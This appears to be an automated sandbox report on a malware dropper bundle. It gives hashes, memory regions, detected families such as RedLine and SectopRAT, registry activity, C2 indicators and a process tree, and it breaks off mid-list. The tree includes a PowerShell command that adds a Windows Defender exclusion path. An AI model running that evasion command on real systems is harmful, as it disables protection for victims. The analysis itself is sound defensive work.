C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2050293ea5.exe
| MD5 | 7d44a083f0e81baf1ecb264b93bdc9a5 |
| SHA1 | 4dd23b40065e2ccfbdd4c79386d7e2d37a53efce |
| SHA256 | 073b1354e582f8fd758bd128d764fd305d50d76fc45147eb1240e8a402ed1da5 |
| SHA512 | 245827096522beb8b54a60ad3549cd7509ab35fe650cb2f7d6b48f4cf76430c25c3162ff284d78b19d2351457bbfbd0d2d71751abeb703fef3e2736ab6825c82 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri200ae385720d3.exe
| MD5 | 8aaec68031b771b85d39f2a00030a906 |
| SHA1 | 7510acf95f3f5e1115a8a29142e4bdca364f971f |
| SHA256 | dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b |
| SHA512 | 4d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209f6924af86d795.exe
| MD5 | 1902e1df4ecf3bf7bcfc0c53b992cd24 |
| SHA1 | a0c9cde0b2113466a820fa6ebcccfdcd93b26b97 |
| SHA256 | c3bf5a1821e67a8d734ce91cb75b6878457f69ea3211a6c1405bfd30759f2720 |
| SHA512 | 37dbad160b91e1fc2079a46e77c8d261ad4f4dbbdfcc4d1c5ea70beeb10d271d48a13ef3b3c76a4878b4187d08a66097cb5a8cf77531a4c0df5914d3be2296b6 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2002ce5f91c761.exe
| MD5 | 39fbed3967544cc6a59e1d1152cdcc35 |
| SHA1 | b9e974a506f3be7fc78574ae008e7686093eb82d |
| SHA256 | cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6 |
| SHA512 | cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe
| MD5 | 85ef31a707d583032b8526d16e8883a8 |
| SHA1 | 16beed53fc46bf75cf4081d73dc843f4d8298569 |
| SHA256 | bce2f04e884c2dd6e799861898546be00a745fa1e743ce51044d2232065d2409 |
| SHA512 | 8e2ca4555b5741400559244bd37e0be09b18e246026e3d0507b02956c27fdc9dabca55672cbd8a52a5832fe66c6da3fe1e649a1cfad101f9c655aa20aa1da31b |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe
| MD5 | a98672182143436478fdb3806ef6cd5a |
| SHA1 | 5d93bb55d9e7915afb11361f42a4c9c6393718b3 |
| SHA256 | 2010cb8b8069ae8e5527526b36f28b78766473b71b67d601351eb361dbef8528 |
| SHA512 | 0d2de593d1e194895833396c49efe194fca56afa3396e6aa41f8a51e961ea4f1ca97697ace0625ea97f5dfe7092b75049c58e582dda122cbc7966cb9a5d18892 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209c4b463b.exe
| MD5 | a729d63514511766fcdd2de19cdbd017 |
| SHA1 | 737827e5c0ab0adc287d3b3bb16d26a9a42f0939 |
| SHA256 | 6dda16414ec5a7f6908f6088ea5edb7c67b024c3f695fbf7048ab823bcfee728 |
| SHA512 | ad6bc65c950a94383f3f1d987508d22167343db632412b74d4734482916a7c18981dc8d84c57109f0882f6c5c6f280db876bafd24837f06996614d1bb9ce6ee2 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20e095683c2b3a0c.exe
| MD5 | 44cfc728f9fbacd834c9b10ce768d41a |
| SHA1 | 6589a1435a2ba5ec11a312de5f339597831227d0 |
| SHA256 | 874c4eab9d0422ee52a1e02e4e95b07805a143dda5a54a19c6a122580aabdb68 |
| SHA512 | dd899e05bcbfaec1c3f46011367e000f3edfca1c2f542f9ed55bcbd136142940733f8aa8cd67bd5f647329195ffb843a255713dae362bc44a817734163409113 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20c0c46650eeb2a.exe
| MD5 | ecc773623762e2e326d7683a9758491b |
| SHA1 | ad186c867976dc5909843418853d54d4065c24ba |
| SHA256 | 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838 |
| SHA512 | 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4 |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209d5bfbb2.exe
| MD5 | d08cc10c7c00e13dfb01513f7f817f87 |
| SHA1 | f3adddd06b5d5b3f7d61e2b72860de09b410f571 |
| SHA256 | 0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d |
| SHA512 | 0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0 |
memory/1964-144-0x0000000000270000-0x0000000000276000-memory.dmp
memory/1740-136-0x0000000000CD0000-0x0000000000D42000-memory.dmp
memory/1964-135-0x0000000000C40000-0x0000000000C58000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2060ea1c5d8fae8aa.exe
| MD5 | ba8541c57dd3aae16584e20effd4c74c |
| SHA1 | 5a49e309db2f74485db177fd9b69e901e900c97d |
| SHA256 | dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c |
| SHA512 | 1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d |
memory/2240-139-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1284-157-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2368-159-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2240-158-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/2440-162-0x0000000003810000-0x0000000003834000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-PMFSC.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/1372-165-0x00000000008D0000-0x00000000008D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-PMFSC.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2440-173-0x0000000003920000-0x0000000003942000-memory.dmp
memory/3052-216-0x0000000002870000-0x00000000029BC000-memory.dmp
memory/1684-219-0x00000000026E0000-0x0000000002909000-memory.dmp
memory/2968-226-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2968-224-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2968-231-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2968-230-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2968-229-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2968-228-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2968-222-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2968-220-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3008-235-0x0000000000400000-0x000000000051C000-memory.dmp
memory/3008-238-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3008-240-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3008-239-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/3008-237-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3008-241-0x0000000000400000-0x000000000051C000-memory.dmp
memory/3008-245-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/3008-248-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3008-249-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3008-247-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3008-242-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3008-236-0x0000000064940000-0x0000000064959000-memory.dmp
memory/852-250-0x0000000000400000-0x00000000016BC000-memory.dmp
memory/2276-251-0x0000000000400000-0x00000000016D5000-memory.dmp
memory/2440-252-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/2368-253-0x0000000000400000-0x0000000000414000-memory.dmp
memory/572-254-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/3052-259-0x0000000002870000-0x00000000029BC000-memory.dmp
memory/1684-260-0x00000000026E0000-0x0000000002909000-memory.dmp
memory/3052-261-0x0000000002DE0000-0x0000000002E85000-memory.dmp
memory/3052-265-0x0000000000CF0000-0x0000000000D82000-memory.dmp
memory/3052-262-0x0000000000CF0000-0x0000000000D82000-memory.dmp
memory/2276-272-0x0000000000400000-0x00000000016D5000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-24 21:35
Reported
2024-11-24 21:37
Platform
win10v2004-20241007-en
Max time kernel
15s
Max time network
121s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2776 set thread context of 4984 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe
"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe
C:\Windows\SysWOW64\cmd.exe
